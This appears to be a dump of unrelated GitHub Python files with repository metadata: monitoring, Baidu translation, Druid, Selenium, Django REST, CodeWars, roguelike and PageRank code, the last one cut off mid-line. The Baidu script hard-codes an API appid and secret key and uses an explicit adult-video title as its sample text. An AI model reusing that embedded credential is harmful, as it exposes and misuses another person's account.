chart.full_clean()\r\n chart.save()\r\n","repo_name":"openwisp/openwisp-monitoring","sub_path":"openwisp_monitoring/check/classes/ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"52"} +{"seq_id":"39872510235","text":"# /usr/bin/env python\n# coding=utf-8\n\n# import httplib\n# import md5\nimport urllib\nimport io\nimport random\nimport urllib.request\nimport hashlib\nfrom hashlib import md5\nimport json\n\nimport sys\n# sys.stdout = 
io.TextIOWrapper(sys.stdout.buffer, encoding='gb2312') # change the default encoding of standard output\n# print(sys.getdefaultencoding())\n# print('\u8266')\n\ndef md52(str):\n    m = hashlib.md5()\n    m.update(str.encode(\"utf8\"))\n    # print(m.hexdigest())\n    return m.hexdigest()\n\n\ndef md5GBK(str1):\n    m = hashlib.md5(str1.encode(encoding='utf-8'))\n    return m.hexdigest()\n    # return m.hexdigest()\n\n\nprint(md52('hello'))\nprint(md5GBK('你好'))\n\nappid = '20180412000145467'\nsecretKey = 'F2ekgIAXYQvZlbWNH0Iu'\n\n# httpClient = None\nmyurl = '/api/trans/vip/translate'\nq = '国民的アイドルいきなり即ハメドッキリ4本番いつでも即合体、どこでも即絶頂三上悠亜'\n# q = \"你好\"\n# print(q)\n# q = b\"\\u756a\\u3044\\u3064\\u3067\\u3082\\u5373\\u5408\\u4f53\\u3001\\u3069\\u3053\\u3067\\u3082\\u5373\\u7d76\\u9802\\u4e09\\u4e0a\\u60a0\\u4e9c\"\n# print(q.encode(\"ascii\"))\n# q = 'hello'\nfromLang = 'jp'\ntoLang = 'zh'\nsalt = random.randint(32768, 65536)\n\nstr(salt)\nprint(1)\nsign = appid + q + str(salt) + secretKey\nprint(2)\n# m1 = md5.new()\n# m1.update(sign)\n# sign = m1.hexdigest()\n\n# md5_obj = md5()\n# md5_obj.update(sign.encode('utf-8', 'ignore'))\n# md5_obj.update(sign.encode(encoding='gb2312'))\nsign = md5GBK(sign)\n\nquery = {\n    'appid': appid,\n    'q': q,\n    'from': fromLang,\n    'to': toLang,\n    'salt': str(salt),\n    'sign': sign\n}\n\nquery_str = urllib.parse.urlencode(query)\nprint(query_str)\n\n# myurl = myurl + '?appid=' + appid + '&q=' + q + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(\n#     salt) + '&sign=' + sign\n\nmyurl += \"?\" + query_str\n\nprint(3)\ntry:\n    url = 'http://api.fanyi.baidu.com' + myurl\n    print(url)\n    req = urllib.request.Request(url=url)\n    print(3.1)\n    res = urllib.request.urlopen(req)\n    print(3.15)\n    data = res.read()\n    print(3.2)\n    obj = json.loads(data, encoding=\"utf-8\")\n    print(4)\n    print(obj)\n    print(obj[\"trans_result\"][0][\"dst\"])\n\n    # httpClient = httplib.HTTPConnection('api.fanyi.baidu.com')\n    # httpClient.request('GET', myurl)\n    #\n    # # response is an HTTPResponse object\n    # response = httpClient.getresponse()\n    # print(response.read())\nexcept Exception as e:\n    print(e)\n","repo_name":"pythonlittleboy/python_gentleman_crawler","sub_path":"test/baidu.py","file_name":"baidu.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15322251965","text":"from functools import reduce\nfrom typing import Optional\n\nfrom flask import current_app, Flask\nfrom sqlalchemy import func\nfrom sqlalchemy.dialects.postgresql import insert\n\nfrom config import aggregation  # type: ignore[attr-defined]\nfrom config import aggregation_rules  # type: ignore[attr-defined]\nfrom config import calculated_indicators  # type: ignore[attr-defined]\nfrom config import indicators  # type: ignore[attr-defined]\nfrom config.general import DEPLOYMENT_NAME\nfrom data.query.mock import (\n    generate_query_mock_data,\n    build_dimension_values,\n)\nfrom log import LOG\nfrom models.alchemy.query import (\n    DimensionValue,\n    DruidDatasource,\n)\nfrom models.alchemy.mixin import utcnow\n\nfrom web.server.app_druid import initialize_druid_context\nfrom web.server.data.data_access import Transaction\nfrom web.server.data.druid_context import PopulatingDruidApplicationContext\n\n\ndef update_db_datasource(\n    datasource_config: Optional[str] = 'LATEST_DATASOURCE',\n    skip_grouped_sketch_sizes: bool = False,\n) -> None:\n    '''Makes a new datasource available to be used in a web server context.\n    To do that it adds it to its database as well as all meta data about it.\n    '''\n    app = 
current_app\n initialize_druid_context(app, datasource_config='LATEST_DATASOURCE')\n valid_datasources = app.druid_context.druid_metadata.get_datasources_for_site(\n DEPLOYMENT_NAME\n )\n if datasource_config is not None:\n _populate_datasource(app, datasource_config, skip_grouped_sketch_sizes)\n else:\n LOG.info('Populating datasources %s', valid_datasources)\n for datasource in valid_datasources:\n LOG.info('Processing datasource %s', datasource)\n _populate_datasource(app, datasource, skip_grouped_sketch_sizes)\n\n LOG.info(\n 'Beginning cleaning up of vanished datasources... Valid datasets are %s',\n valid_datasources,\n )\n\n with Transaction() as transaction:\n session = transaction.run_raw()\n deleted_datasource_ids = [\n ds_id\n for ds_id, in session.execute(\n # pylint: disable=no-member\n DruidDatasource.__table__.delete()\n .where(DruidDatasource.datasource.notin_(valid_datasources))\n .returning(DruidDatasource.id)\n )\n ]\n\n # First, remove the deleted datasources from all the rows that were referencing it\n session.query(DimensionValue).filter(\n DimensionValue.datasources.op('&&')(deleted_datasource_ids)\n ).update(\n {\n 'datasources': reduce(\n func.array_remove,\n deleted_datasource_ids,\n DimensionValue.datasources,\n )\n },\n synchronize_session=False,\n )\n\n # Then remove the rows that were orpaned by the previous one, i.e. now have no any\n # associated datasources\n session.query(DimensionValue).filter(DimensionValue.datasources == []).delete(\n synchronize_session=False\n )\n\n\ndef _populate_datasource(\n app: Flask, datasource_config: str, skip_grouped_sketch_sizes: bool\n) -> None:\n initialize_druid_context(\n app,\n datasource_config=datasource_config,\n cls=PopulatingDruidApplicationContext,\n skip_grouped_sketch_sizes=skip_grouped_sketch_sizes,\n )\n\n LOG.info('Generating Query mock data')\n druid_context = app.druid_context\n dimension_values = druid_context.dimension_values_lookup\n query_data = generate_query_mock_data(\n indicators.DATA_SOURCES,\n aggregation.DIMENSION_CATEGORIES,\n aggregation.CALENDAR_SETTINGS,\n aggregation_rules.CALCULATIONS_FOR_FIELD,\n calculated_indicators.CALCULATED_INDICATOR_CONSTITUENTS,\n druid_context.dimension_metadata.field_metadata,\n )\n LOG.info('Finished generating Query mock data')\n\n LOG.info('Beginning data population...')\n with Transaction() as transaction:\n datasource_values = {\n 'datasource': druid_context.current_datasource.name,\n 'min_date': druid_context.data_time_boundary.get_min_data_date(),\n 'max_date': druid_context.data_time_boundary.get_max_data_date(),\n 'meta_data': {\n 'sketch_sizes': druid_context.dimension_metadata.sketch_sizes,\n 'grouped_dimension_sketch_sizes': (\n druid_context.dimension_metadata.grouped_dimension_sketch_sizes\n ),\n },\n 'last_modified': utcnow(),\n }\n (current_datasource_id,) = next(\n transaction.run_raw().execute(\n insert(DruidDatasource)\n .values(datasource_values)\n .on_conflict_do_update(\n index_elements=['datasource'],\n set_=datasource_values,\n )\n .returning(DruidDatasource.id)\n )\n )\n build_dimension_values(\n transaction.run_raw(),\n current_datasource_id,\n query_data.dimensions,\n dimension_values.dimension_map,\n aggregation.DIMENSION_PARENTS,\n )\n","repo_name":"Zenysis/Harmony","sub_path":"db/druid/update_db_datasource.py","file_name":"update_db_datasource.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} 
+{"seq_id":"33192260983","text":"\"\"\"\n鼠标相关的操作方法都封装在ActionChains类里面\nperform() 执行ActionChains类中存储的所有行为\ncontext_click() 右击\ndouble_click() 双击\ndrag_and_drop() 拖动\nmove_to_element() 鼠标悬停\n\"\"\"\nfrom selenium.webdriver import ActionChains\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\ndriver.get(\"https://www.baidu.com/?tn=78000241_hao_pg\")\n\nelement = driver.find_element_by_css_selector(\"#s-usersetting-top\")\n# 对元素执行悬停操作\nActionChains(driver).move_to_element(element).perform()\nelement1 = driver.find_element_by_xpath(\"//span[@id='s-usersetting-top']\")\n# 对元素进行双击操作\nActionChains(driver).double_click(element1).perform()","repo_name":"UULIN/automation_test","sub_path":"unit4_WebDriver_API/4.4鼠标操作.py","file_name":"4.4鼠标操作.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11907945253","text":"from constance.backends.database.models import Constance\nfrom django.conf import settings\nfrom django_celery_results.models import TaskResult\nfrom django_filters import rest_framework as filters\nfrom django.db import transaction\nfrom django_celery_beat.models import PeriodicTask, IntervalSchedule\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.filters import SearchFilter\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom apps.system.serializers import ConstanceSerializer, IntervalScheduleSerializer, PeriodicTaskDefaultSerializer, \\\n TaskResultDefaultSerializer\nfrom rc871_backend.utils.functions import get_settings\n\n\nclass ConfigurationFilter(filters.FilterSet):\n class Meta:\n model = Constance\n fields = ['key']\n\n\nclass ConfigurationViewSet(ModelViewSet):\n queryset = Constance.objects.all()\n serializer_class = ConstanceSerializer\n filter_backends = [DjangoFilterBackend]\n filterset_class = ConfigurationFilter\n paginator = None\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n value = request.data.get('value', None)\n instance.value = value\n instance.save()\n return Response(ConstanceSerializer(instance).data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['PUT', ])\n @transaction.atomic()\n def update_multiple(self, request):\n for item in request.data:\n instance = Constance.objects.get(key=item.get('key'))\n instance.value = item.get('value', None)\n instance.save(update_fields=['value'])\n return Response(request.data, status=status.HTTP_200_OK)\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n get all setting item\n \"\"\"\n allow_settings = [key for key, options in getattr(\n settings, 'CONSTANCE_CONFIG', {}).items()]\n items = get_settings(allow_settings)\n return Response(items, status=status.HTTP_200_OK)\n\n @action(methods=['GET', ], detail=False)\n def retrieve_for_key(self, request):\n key = self.request.query_params.get('key', None)\n if key:\n instance = Constance.objects.get(key=key)\n data = {\n 'id': str(instance.id),\n 'key': instance.key,\n 'value': instance.value\n }\n return Response(data)\n else:\n return Response({\"error\": \"el key es obligatorio\"}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass ConfigurationGlobalViewSet(APIView):\n permission_classes = (AllowAny,)\n authentication_classes = []\n\n def get(self, request, 
format=None):\n key = self.request.query_params.get('key', None)\n if key:\n instance = Constance.objects.get(key=key)\n data = {\n 'id': str(instance.id),\n 'key': instance.key,\n 'value': instance.value\n }\n return Response(data)\n else:\n return Response({\"error\": \"el key es obligatorio\"}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass IntervalScheduleViewSet(ModelViewSet):\n queryset = IntervalSchedule.objects.all()\n serializer_class = IntervalScheduleSerializer\n\n @action(methods=['GET'], detail=False)\n def field_options(self, request):\n field = self.request.query_params.get('field', None)\n fields = self.request.query_params.getlist('fields', None)\n if fields:\n try:\n data = {}\n for field in fields:\n data[field] = []\n for c in IntervalSchedule._meta.get_field(field).choices:\n data[field].append({\n \"value\": c[0],\n \"description\": c[1]\n })\n return Response(data, status=status.HTTP_200_OK)\n except ValueError as e:\n return Response(e, status=status.HTTP_400_BAD_REQUEST)\n elif field:\n try:\n choices = []\n for c in IntervalSchedule._meta.get_field(field).choices:\n choices.append({\n \"value\": c[0],\n \"description\": c[1]\n })\n return Response(choices, status=status.HTTP_200_OK)\n except ValueError as e:\n return Response(e, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"error\": \"the field parameter is mandatory\"}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass InfoAPIView(APIView):\n permission_classes = (AllowAny,)\n authentication_classes = []\n\n def get(self, request, format=None):\n return Response({\n 'version': settings.SITE_VERSION,\n 'logo': settings.SITE_LOGO,\n 'name': settings.SITE_NAME\n }, status=status.HTTP_200_OK)\n\n\nclass PeriodicTaskViewSet(ModelViewSet):\n queryset = PeriodicTask.objects.all()\n serializer_class = PeriodicTaskDefaultSerializer\n\n\nclass TaskResultFilter(filters.FilterSet):\n module = filters.CharFilter(method=\"get_module\")\n\n class Meta:\n model = TaskResult\n fields = ['id', 'task_name', 'status', 'result']\n\n def get_module(self, queryset, name, value):\n if value:\n return queryset.filter(accounts__mobile_payment_applies=True)\n return queryset\n\n\nclass TaskResultViewSet(ModelViewSet):\n queryset = TaskResult.objects.all()\n serializer_class = TaskResultDefaultSerializer\n filter_backends = [DjangoFilterBackend, SearchFilter]\n filterset_class = TaskResultFilter\n search_fields = ['id', 'task_name', 'status']\n\n def paginate_queryset(self, queryset):\n \"\"\"\n Return a single page of results, or `None` if pagination is disabled.\n \"\"\"\n not_paginator = self.request.query_params.get('not_paginator', None)\n\n if not_paginator:\n return None\n return self.paginator.paginate_queryset(queryset, self.request, view=self)\n\n @action(methods=['GET'], detail=False)\n def field_options(self, request):\n field = self.request.query_params.get('field', None)\n fields = self.request.query_params.getlist('fields', None)\n if fields:\n try:\n data = {}\n for field in fields:\n data[field] = []\n for c in TaskResult._meta.get_field(field).choices:\n data[field].append({\n \"value\": c[0],\n \"description\": c[1]\n })\n return Response(data, status=status.HTTP_200_OK)\n except ValueError as e:\n return Response(e, status=status.HTTP_400_BAD_REQUEST)\n elif field:\n try:\n choices = []\n for c in TaskResult._meta.get_field(field).choices:\n choices.append({\n \"value\": c[0],\n \"description\": c[1]\n })\n return Response(choices, status=status.HTTP_200_OK)\n except ValueError as e:\n return Response(e, 
status=status.HTTP_400_BAD_REQUEST)\n        else:\n            return Response({\"error\": \"the field parameter is mandatory\"}, status=status.HTTP_400_BAD_REQUEST)\n\n","repo_name":"YAVILES/rc871_backend","sub_path":"apps/system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73652121124","text":"# You have to create a function that takes a positive integer number and returns the next bigger number formed by the same digits:\n\ndef next_bigger(n):\n\n    digits = [int(x) for x in str(n)]\n    \n    for x in range(len(digits)-1, 0, -1):\n        if digits[x] > digits[x-1]:\n            slice = [digits[x-1]] + sorted(digits[x:])\n            digits[x-1:] = []\n            \n            for i in range(len(slice)-1):\n                if slice[0] < slice[i+1]:\n                    slice[0], slice[i+1] = slice[i+1], slice[0]\n                    digits.append(slice[0])\n                    slice.pop(0)\n                    digits += sorted(slice)\n                    break\n            \n            return int(''.join([str(i) for i in digits]))\n    return -1\n","repo_name":"andreicosmind/CodeWars","sub_path":"Next_bigger_number_with_the_same_digits.py","file_name":"Next_bigger_number_with_the_same_digits.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7748156238","text":"import json\n\n\nclass Title:\n    \"\"\"\n    The DTO class parses a \"3_Title\" element object from a DataHub general instance.\n    \"\"\"\n\n    def __init__(self, title: str):\n        self.title: str = title\n\n    @classmethod\n    def create_from_dict(cls, element: dict):\n        title = element[\"title\"][\"@value\"]\n\n        return cls(title)\n\n    @classmethod\n    def create_from_mock_result(cls, mock_json=None):\n        if mock_json is None:\n            mock_json = cls.MOCK_JSON\n        return Title.create_from_dict(json.loads(mock_json))\n\n    MOCK_JSON = \"\"\"\n    {\n      \"@context\": {\n        \"title\": \"https://schema.metadatacenter.org/properties/4ffd7c46-1df8-4885-ade4-50d542d5b81e\"\n      },\n      \"title\": {\n        \"@value\": \"Mock title - Test\"\n      }\n    }\n    \"\"\"\n","repo_name":"MaastrichtUniversity/cedar-parsing-utils","sub_path":"cedarparsingutils/dto/general_elements/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30193900818","text":"from constants import *\n\n# ___  _     _           _      \n# / _ \\| |__ (_) ___  ___| |_ ___ \n#| | | | '_ \\| |/ _ \\/ __| __/ __|\n#| |_| | |_) | |  __/ (__| |_\\__ \\\n# \\___/|_.__// |\\___|\\___|\\__|___/\n#          |__/                   \n\nclass Actor:\n    '''Interactable object in the game'''\n    def __init__(self, x, y, name, sprite, creature=None, ai=None):\n        self.x = x #map address, not pixel address\n        self.y = y\n        self.sprite = sprite\n\n        #components\n        self.creature = creature # player.creature would reference the creature component\n        if creature:\n            creature.owner = self # the creature belongs to the Actor that called it\n        \n        self.ai = ai\n        if ai:\n            ai.owner = self\n\n\n    def draw(self, DISPLAYSURF):\n        '''Draw actor on the main surface'''\n        DISPLAYSURF.blit(self.sprite, (self.x*CELL_WIDTH, self.y*CELL_HEIGHT))\n\n    def move(self, dx, dy, game_map):\n        #check if path is blocked before moving\n        if game_map[self.x + dx][self.y + dy].block_path == False:\n            self.x += dx\n            self.y += dy\n","repo_name":"Daniel4125/python_roguelike","sub_path":"objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"25422881848","text":"from datetime import datetime, timedelta, date\nfrom typing import Dict, BinaryIO\n\nimport requests\nfrom django.db import transaction\nfrom django.db.models import Q, Sum, When, Case, IntegerField, F\nfrom django.utils import timezone\nfrom django.core.exceptions import ValidationError\n\nfrom odin.users.models import BaseUser\n\nfrom .models import (\n Course,\n CourseAssignment,\n CourseDescription,\n Student,\n Teacher,\n Week,\n IncludedMaterial,\n Material,\n IncludedTask,\n Task,\n ProgrammingLanguage,\n Solution,\n Test,\n IncludedTest,\n StudentNote,\n Lecture,\n SolutionComment,\n)\n\n\ndef add_student(course: Course, student: Student) -> CourseAssignment:\n return CourseAssignment.objects.create(course=course, student=student)\n\n\ndef add_teacher(course: Course, teacher: Teacher, hidden: bool=False) -> CourseAssignment:\n return CourseAssignment.objects.create(course=course, teacher=teacher, hidden=hidden)\n\n\n@transaction.atomic\ndef create_course(\n *,\n name: str,\n start_date: datetime,\n end_date: datetime,\n repository: str,\n facebook_group: str=None,\n video_channel: str=None,\n slug_url: str=None,\n logo: BinaryIO=None,\n public: bool=True,\n attendable: bool=True,\n description: str=\"\"\n) -> Course:\n\n if Course.objects.filter(name=name).exists():\n raise ValidationError('Course already exists')\n\n course = Course.objects.create(\n name=name,\n start_date=start_date,\n end_date=end_date,\n repository=repository,\n facebook_group=facebook_group,\n video_channel=video_channel,\n slug_url=slug_url,\n logo=logo,\n public=public\n )\n\n weeks = course.duration_in_weeks\n start_date = course.start_date - timedelta(days=start_date.weekday())\n\n week_instances = []\n for i in range(1, weeks + 1):\n current = Week(\n course=course,\n number=i,\n start_date=start_date,\n end_date=start_date + timedelta(days=6)\n )\n\n start_date = current.end_date + timedelta(days=1)\n week_instances.append(current)\n\n Week.objects.bulk_create(week_instances)\n CourseDescription.objects.create(course=course, verbose=description)\n\n return course\n\n\ndef create_included_material(\n *,\n course: Course,\n week: Week,\n identifier: str=None,\n url: str=None,\n content: str=None,\n existing_material: Material=None\n) -> IncludedMaterial:\n\n included_material = IncludedMaterial(week=week, course=course)\n\n if existing_material is None:\n existing_material = Material(identifier=identifier, url=url, content=content)\n existing_material.full_clean()\n existing_material.save()\n\n included_material.identifier = existing_material.identifier\n included_material.url = existing_material.url\n included_material.content = existing_material.content\n\n included_material.material = existing_material\n included_material.full_clean()\n included_material.save()\n\n return included_material\n\n\ndef create_included_task(\n *,\n course: Course,\n week: Week,\n name: str=None,\n description: str=None,\n gradable: bool=False,\n existing_task: Task=None,\n)-> IncludedTask:\n\n included_task = IncludedTask(week=week, course=course)\n if existing_task is None:\n existing_task = Task(name=name, description=description, gradable=gradable)\n existing_task.full_clean()\n existing_task.save()\n\n included_task.name = existing_task.name\n included_task.description = existing_task.description\n included_task.gradable = existing_task.gradable\n\n included_task.task = existing_task\n included_task.full_clean()\n included_task.save()\n\n return included_task\n\n\ndef 
create_test_for_task(\n *,\n existing_test: Test=None,\n task: IncludedTask,\n language: ProgrammingLanguage,\n extra_options: Dict={},\n code: str=None,\n requirements: str=None,\n file: BinaryIO=None\n):\n\n new_test = IncludedTest(task=task)\n if existing_test is None:\n existing_test = Test(\n language=language,\n extra_options=extra_options,\n code=code,\n requirements=requirements,\n file=file\n )\n existing_test.full_clean()\n existing_test.save()\n\n new_test.language = existing_test.language\n new_test.extra_options = existing_test.extra_options\n new_test.code = existing_test.code\n new_test.requirements = existing_test.requirements\n new_test.file = existing_test.file\n\n new_test.test = existing_test\n new_test.save()\n\n return new_test\n\n\ndef create_gradable_solution(\n *,\n task: IncludedTask,\n user: BaseUser,\n code: str=None,\n file: BinaryIO=None\n) -> Solution:\n\n if code is not None and file is not None:\n raise ValidationError(\"Provide either code or a file, not both!\")\n if code is None and file is None:\n raise ValidationError(\"Provide either code or a file!\")\n if code is not None:\n new_solution = Solution.objects.create(\n task=task,\n user=user,\n code=code,\n status=6\n )\n if file is not None:\n new_solution = Solution.objects.create(\n task=task,\n user=user,\n file=file,\n status=6\n )\n\n return new_solution\n\n\ndef create_non_gradable_solution(\n *,\n task: IncludedTask,\n user: BaseUser,\n url: str=None\n) -> Solution:\n\n if url is None:\n raise ValidationError(\"Provide a url!\")\n new_solution = Solution.objects.create(\n task=task,\n user=user,\n url=url,\n status=6\n )\n\n return new_solution\n\n\ndef calculate_student_valid_solutions_for_course(\n *,\n user: BaseUser,\n course: Course\n) -> str:\n\n total_tasks = IncludedTask.objects.filter(course=course).count()\n if not total_tasks:\n return 0\n solved_tasks = Solution.objects.get_solved_solutions_for_student_and_course(user, course).count()\n\n ratio = (solved_tasks/total_tasks) * 100\n return f'{ratio:.1f}'\n\n\ndef get_all_student_solution_statistics(\n *,\n task: IncludedTask\n) -> Dict:\n\n result = {}\n course = task.course\n result['total_student_count'] = course.students.count()\n\n filters = {'solutions__task': task, 'solutions__isnull': False}\n result['students_with_a_submitted_solution_count'] = course.students.filter(**filters).distinct().count()\n q_expression = Q(solutions__task__gradable=True, solutions__status=Solution.OK) \\\n | Q(solutions__task__gradable=False, solutions__status=Solution.SUBMITTED_WITHOUT_GRADING)\n result['students_with_a_passing_solution_count'] = course.students.filter(\n q_expression, solutions__task=task\n ).distinct().count()\n\n return result\n\n\ndef create_student_note(\n *,\n author: Teacher,\n assignment: CourseAssignment,\n text: str\n) -> StudentNote:\n\n note = StudentNote(\n author=author,\n assignment=assignment,\n text=text\n )\n\n note.full_clean()\n note.save()\n\n return note\n\n\ndef create_lecture(\n *,\n date: date,\n course: Course\n) -> Lecture:\n\n week_qs = Week.objects.filter(start_date__lte=date, end_date__gte=date, course=course)\n if week_qs.exists():\n lecture = Lecture(date=date, course=course, week=week_qs.first())\n lecture.full_clean()\n lecture.save()\n\n return lecture\n else:\n raise ValidationError('Date not in range of any week for this course')\n\n\ndef add_week_to_course(\n *,\n course: Course,\n new_end_date: timezone.datetime.date\n) -> Week:\n\n last_week = course.weeks.last()\n new_week = 
Week.objects.create(\n course=course,\n number=last_week.number + 1,\n start_date=course.end_date,\n end_date=new_end_date\n )\n\n course.end_date = course.end_date + timezone.timedelta(days=7)\n course.save()\n\n return new_week\n\n\ndef create_solution_comment(\n *,\n solution: Solution,\n user: BaseUser,\n text: str\n) -> SolutionComment:\n\n comment = SolutionComment(\n solution=solution,\n user=user,\n text=text\n )\n\n comment.full_clean()\n comment.save()\n\n return comment\n\n\ndef get_gradable_tasks_for_course(\n *,\n course: Course,\n user: BaseUser\n):\n\n tasks = []\n\n for task in course.included_tasks.order_by('week__number', 'task__id'):\n if task.gradable:\n task.last_solution = get_last_solution_for_task(\n task=task,\n user=user\n )\n tasks.append(task)\n\n return tasks\n\n\ndef get_last_solution_for_task(\n *,\n task: IncludedTask,\n user: BaseUser\n) -> Solution:\n\n return Solution.objects.filter(task=task, user=user).order_by('-id').first()\n\n\ndef create_included_task_with_test(\n *,\n course: Course,\n language: ProgrammingLanguage,\n week: Week,\n name: str,\n code: str,\n requirements: str=None,\n gradable: bool,\n description_url: str\n):\n\n if not description_url.endswith('README.md'):\n description_url = description_url.replace('tree', 'blob')\n description_url = f'{description_url}/README.md'\n\n description_url = f'{description_url}?raw=1'\n\n markdown = requests.get(description_url, timeout=2).text\n\n included_task = create_included_task(\n course=course,\n week=week,\n name=name,\n description=markdown,\n gradable=gradable\n )\n included_task.save()\n\n if included_task.gradable:\n\n included_test = create_test_for_task(\n task=included_task,\n code=code,\n language=language,\n requirements=requirements\n )\n\n included_test.save()\n\n return included_task\n\n\ndef get_user_solution_summary(\n user: BaseUser\n):\n\n results = Solution.objects.aggregate(\n OK=Sum(\n Case(\n When(Q(status__in=['2']) & Q(user=user), then=1),\n output_field=IntegerField()\n )\n ),\n TOTAL=Sum(\n Case(\n When(Q(status__range=(0, 6)) & Q(user=user), then=1),\n output_field=IntegerField()\n )\n )\n )\n\n completed_tasks = user.solutions.filter(status=2).annotate(\n name=F('task__name'),\n task_id=F('task'),\n solution_id=F('id'),\n solution_code=F('code'),\n test_result=F('test_output')\n ).values('name', 'task_id', 'solution_code', 'test_result', 'solution_id')\n\n results['completed_tasks'] = completed_tasks\n\n return results\n\n\ndef get_user_avatar_url(\n user: BaseUser\n):\n\n if not user.profile.full_image:\n return None\n\n return str(user.profile.full_image.url)\n","repo_name":"prabhatpankaj/Odin","sub_path":"odin/education/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":10722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"780666184","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 9 09:16:37 2020\nCompute PageRank in blocks, with normalization\n@author: wangrui\n\"\"\"\n\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport os, csv, networkx as nx\nimport time\nimport pandas as pd\n\nmin_error=0.0001\nmax_iter=1000\n\ndef parse(filename): # parse the csv\n# reader = csv.reader(open(filename, 'r'), delimiter=',')\n DG = nx.DiGraph()\n csv_reader = csv.reader(open(filename,encoding = 'utf-8'))\n font_weight = tuple(csv_reader)\n DG.add_weighted_edges_from(font_weight)\n return DG\n\nclass PageRank:\n def __init__(self, graph):\n# def __init__(self):\n self.graph = graph\n# self.V = len(self.graph) # total number of citing documents\n 
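# Note: d is the damping factor; each block update below computes x_next = d * (x @ L_block) + (1 - d) * 1000 / N_nodes, i.e. the standard PageRank iteration scaled to a total mass of 1000 instead of 1.\n 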
self.d = 0.2 # damping factor\n# self.ranks = dict() # store iteration results\n \n def rank(self):\n# for key in self.graph.nodes:\n# self.ranks[key] = 0.0 # initialize every node's rank to 0\n N_nodes = len(self.graph.nodes)\n print(N_nodes)\n graph_list = list(self.graph.nodes) # elements are node ids\n N = 1 # number of matrix blocks\n one_fourthNum = N_nodes//N \n print('Nodes per block: '+str(one_fourthNum))\n # read the blocks\n now = time.time()\n last_time = now\n last_block_time = now\n # compute row sums\n sum_l = np.zeros(N_nodes,dtype = 'float32')\n print('Start computing row sums',)\n start_sum_time = time.time()\n sum_time = time.time()\n for num_sum in range(N):\n print('>>>>>>'+str(num_sum))\n if num_sum < N-1:\n cur = np.zeros((N_nodes,one_fourthNum),dtype='float32')\n for key, node, weight in self.graph.edges(data=True):\n if graph_list.index(node) >= one_fourthNum*num_sum and graph_list.index(node) < one_fourthNum*(num_sum+1):\n # if the out-link node id falls in this block's column range, add the corresponding weight\n cur[graph_list.index(key), graph_list.index(node)-one_fourthNum*num_sum] = weight['weight']\n else: # the node count may not divide evenly, so the last block is handled separately\n cur = np.zeros((N_nodes,N_nodes-one_fourthNum*(N-1)),dtype='float32')\n for key, node, weight in self.graph.edges(data=True):\n if graph_list.index(node) >= one_fourthNum*(N-1):\n cur[graph_list.index(key), graph_list.index(node)-one_fourthNum*(N-1)] = weight['weight']\n sum_l += cur.sum(axis=1)\n del cur\n end_sum_time = time.time()\n print('Current block took {} s:'.format(end_sum_time-start_sum_time))\n start_sum_time = end_sum_time\n print('<<<<<<')\n print('Row sums finished, took {} s'.format(time.time()-sum_time))\n# sum_l = pd.read_csv('norm1_sum.csv')['sum'].values\n # initialize the vector\n# x0 = np.zeros(N_nodes,dtype='float32')\n# for xnum in range(len(x0)):\n# x0[xnum] = 1000/N_nodes\n x0 = pd.read_csv('PR0_0.0001_1000_1-d_0.55.csv')['PR'].values\n print('Before iteration, number of zeros in x0: {}'.format(np.sum(x0==0)))\n # start iterating\n for j in range(max_iter):\n print('Starting iteration round {}!'.format(j))\n x_next = [] # initialize x_next\n for i in range(N):\n if i < N-1:\n cur = np.zeros((N_nodes,one_fourthNum),dtype='float32')\n for key, node, weight in self.graph.edges(data=True):\n if graph_list.index(node) >= one_fourthNum*i and graph_list.index(node) < one_fourthNum*(i+1):\n # if the out-link node id falls in this block's column range, add the corresponding weight\n cur[graph_list.index(key), graph_list.index(node)-one_fourthNum*i] = weight['weight']\n else: # the node count may not divide evenly, so the last block is handled separately\n cur = np.zeros((N_nodes,N_nodes-one_fourthNum*(N-1)),dtype='float32')\n for key, node, weight in self.graph.edges(data=True):\n if graph_list.index(node) >= one_fourthNum*(N-1):\n cur[graph_list.index(key), graph_list.index(node)-one_fourthNum*(N-1)] = weight['weight']\n # normalize\n for k in range(N_nodes):\n if sum_l[k]>0:\n cur[k, :] /= sum_l[k] # L\n else:\n cur[k, :] = 1 / N_nodes\n print(cur)\n cur_block_time = time.time()\n print(\"Current block total time {} s\".format(cur_block_time-last_block_time))\n last_block_time = cur_block_time\n # compute this block's PR values from the block matrix\n x_cur = self.d * np.dot(x0, cur) + (1.0 - 